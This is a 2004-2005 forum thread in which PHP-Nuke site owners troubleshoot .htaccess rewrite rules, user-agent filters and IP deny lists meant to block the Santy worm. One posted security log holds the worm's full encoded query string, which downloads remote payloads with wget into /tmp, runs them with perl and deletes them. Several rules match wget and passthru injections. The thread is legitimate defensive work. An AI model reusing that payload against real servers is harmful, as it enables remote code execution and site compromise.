Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
yaanno
New Member
New Member


Joined: Dec 29, 2004
Posts: 2

PostPosted: Wed Dec 29, 2004 4:40 am Reply with quote

Hia all,

Perhaps we could redirect all queries containin' the "http://" string in a way:

#variant-5 redirect all inner Only registered users can see links on this board! Get registered or login! request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]

sorry for my bad english guys Smile

yaanno
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Wed Dec 29, 2004 7:51 am Reply with quote

Your English is fine Smile That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!
 
View user's profile Send private message
yaanno
PostPosted: Wed Dec 29, 2004 8:05 am Reply with quote

Raven wrote:
Your English is fine Smile That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!


Thanks Raven,

Unfortunately these solutions doesn't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? poor guys Wink

My journal currently run under nuke 5.6 (oh my god! Smile ) and broken down by this worm. So i did a hack in my mainfile.php in this way:

foreach ($HTTP_GET_VARS as $secvalue)
{
if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
{
die ("I don't like you...");
}
elseif (eregi("http", $secvalue))
{
die ("Don't bother me...");
}
elseif (eregi("cd", $secvalue))
{
die ("Go away...");
}
elseif (eregi("cd /tmp;wget", $secvalue))
{
die ("I call the FBI...");
}
}

Cheers and happy Worm-ending Year,

yaanno
 
Raven
PostPosted: Wed Dec 29, 2004 8:10 am Reply with quote

Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one Rolling Eyes
 
cprompt
Regular
Regular


Joined: Jun 08, 2004
Posts: 64

PostPosted: Mon Jan 03, 2005 11:07 am Reply with quote

LWP::Simple and lwp-trivial STILL getting thru on my site.

my htaccess:
from the top:

Code:
RewriteEngine on

RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]
RewriteCond %{REQUEST_URI} ^civa[NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]


the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!

I also placed this in my header.php file.

Code:
if (strpos($HTTP_USER_AGENT, 'LWP::Simple') > 0) {

exit;
};
if (strpos($HTTP_USER_AGENT, 'lwp-trivial') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'myhost.gb.com') > 0) {
exit;
};
if (strpos($HTTP_REFERER, 'mall.uk.net') > 0) {
exit;
};
 
View user's profile Send private message
Raven
PostPosted: Mon Jan 03, 2005 11:49 am Reply with quote

Replace ALL your lwp code with one line:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
 
cprompt
PostPosted: Tue Jan 04, 2005 9:19 am Reply with quote

I made your advised change raven and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple

Quote:
Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: Only registered users can see links on this board! Get registered or login!
%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET
 
Raven
PostPosted: Tue Jan 04, 2005 9:48 am Reply with quote

Post your .htaccess. I know this works. Something is wrong but it's not that code.
 
cprompt
PostPosted: Tue Jan 04, 2005 9:52 am Reply with quote

Code:
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa  [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ Only registered users can see links on this board! Get registered or login! [L]

PHP_FLAG output_buffering on

deny from 148.244.150.52
deny from 200.106.110.236
deny from 200.181.83.243
deny from 219.95.196.80
deny from 68.60.213.202
deny from 200.181.83.243
deny from 148.244.150.52
deny from 219.95.196.80
deny from 200.72.173.120
deny from 209.237.238.181
deny from 192.168.163.167
deny from 68.98.231.137
deny from 82.160.30.194
deny from 81.215.255.48
deny from 67.165.48.29
deny from 209.13.239.235
deny from 66.82.9.54
deny from 209.237.238.180
deny from 200.64.54.223
deny from 212.200.53.61
deny from 81.214.57.246
deny from 211.157.36.6
deny from 211.157.36.4
deny from 12.175.0.35
deny from 203.162.44.73
deny from 213.103.65.23
deny from 10.90.24.11
deny from 80.132.120.148
deny from 209.237.238.166
deny from 213.103.194.140
deny from 217.220.100.158
deny from 207.230.138.240
deny from 208.180.220.197
deny from 66.69.165.44
deny from 213.103.212.15
deny from 81.15.156.33
deny from 203.203.82.241
deny from 212.244.141.2
deny from 202.58.199.241
deny from 132.249.20.69
deny from 195.151.252.177
deny from 195.151.101.150
deny from 217.23.241.101
deny from 64.86.231.98
deny from 210.177.248.65
deny from 12.170.99.234
deny from 67.131.119.83
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.50.42
deny from 66.98.250.82
 
Raven
PostPosted: Tue Jan 04, 2005 9:59 am Reply with quote

You aren't usinh [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR] 

RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa  [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ Only registered users can see links on this board! Get registered or login! [L]
 
cprompt
PostPosted: Tue Jan 04, 2005 10:06 am Reply with quote

thanks raven I'll give that a try. Thanks for your patience.
 
ring_c
Involved
Involved


Joined: Dec 28, 2003
Posts: 276
Location: Israel

PostPosted: Thu Mar 03, 2005 2:41 am Reply with quote

I've tried your code in the .htaccess file, but I still get emails such as this one:

Quote:
Date & Time: 2005-03-03 03:33:55
Blocked IP: 213.167.167.52
User ID: משתמש לא רשום (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.76
Query String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 213.167.167.52
Remote Port: 15790
Request Method: GET


here's my .htaccess. could you tell me what's wrong:

Code:
# $Author: zx $ 

# $Date: 2003/08/17 14:03:21 $

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248
 
View user's profile Send private message Visit poster's website
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Thu Mar 03, 2005 7:50 am Reply with quote

Try this instead:

Find:
Code:
#Check for Santy Worms and redirect them to a phantom site

#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]


And replace with:
Code:
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20


That pretty much covers mine.

_________________
Steph Benoit Only registered users can see links on this board! Get registered or login!
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly) 
View user's profile Send private message Visit poster's website
ring_c
PostPosted: Thu Mar 03, 2005 4:34 pm Reply with quote

Thanks alot. updated.
Now we'll see if more emails are coming in...

thanks again!
 
ring_c
PostPosted: Fri Mar 04, 2005 2:26 am Reply with quote

Yet, no go! Sad

here's one of three email I got today:

Code:
Date & Time: 2005-03-03 17:56:03

Blocked IP: 213.196.37.240
User ID: îůúîů ěŕ řůĺí (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.36
Query String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 213.196.37.240
Remote Port: 2720
Request Method: GET


HELP!!!!!!!!!!!!
 
Raven
PostPosted: Fri Mar 04, 2005 2:37 am Reply with quote

ring_c, do you have this line in your .htaccess?

RewriteEngine on
 
ring_c
PostPosted: Fri Mar 04, 2005 2:43 am Reply with quote

Raven wrote:
ring_c, do you have this line in your .htaccess?

RewriteEngine on


Nope...

Here's my current .htaccess:

Code:
# $Author: zx $ 

# $Date: 2003/08/17 14:03:21 $

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L]

# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>

<Limit GET PUT POST>
  Order Allow,Deny
  deny from 200.
  Allow from all
</Limit>


<Files 403.shtml>
order allow,deny
allow from all
</Files>


Anything??? Sad
 
Raven
PostPosted: Fri Mar 04, 2005 3:36 am Reply with quote

ROTFL Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be Wink
 
ring_c
PostPosted: Fri Mar 04, 2005 4:15 am Reply with quote

Quote:

Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be

Oops... how have I missed that?!

Just a sec.... is mod_rewrite a modudle I need to install with my phpnuke or something?
 
Raven
PostPosted: Fri Mar 04, 2005 4:23 am Reply with quote

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.
 
VinDSL
Life Cycles Becoming CPU Cycles


Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

PostPosted: Fri Mar 04, 2005 5:05 am Reply with quote

Raven wrote:
ROTFL Without that line, mod_rewrite isn't turned on.
Therefore, it won't work. look at the examples above to see how it's
supposed to be

True! Generally speaking, rewrite configurations are not inherited, even
though the conditions, rules, et cetera are. So, I always add this line (once)
at the top of all my .htaccess file[s] just to play it safe... Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: Only registered users can see links on this board! Get registered or login! | Only registered users can see links on this board! Get registered or login! ::. 
View user's profile Send private message Visit poster's website ICQ Number
ring_c
PostPosted: Fri Mar 04, 2005 6:20 am Reply with quote

Quote:

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

I don't have access to the shell (command prompt). Sad
Is there any other way to tell?
 
ring_c
PostPosted: Fri Mar 04, 2005 6:25 am Reply with quote

Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found that:

Under configuration/Standard there's a table. the relevant line says:
Directove: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=

Is that ok?
 
Raven
PostPosted: Fri Mar 04, 2005 7:34 am Reply with quote

You don't need a shell anyway. Just save this script to a file and run it:
Code:
<? 

phpinfo();
?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
 
ring_c
PostPosted: Fri Mar 04, 2005 8:07 am Reply with quote

Raven wrote:
You don't need a shell anyway. Just save this script to a file and run it:
Code:
<? 

phpinfo();
?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core


Thanks, done that and it seems to be the exact page my host supplied before. Yet, no mod_rewrite anywhere on that page.

Couldn't also find any "Loaded Modules" there.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©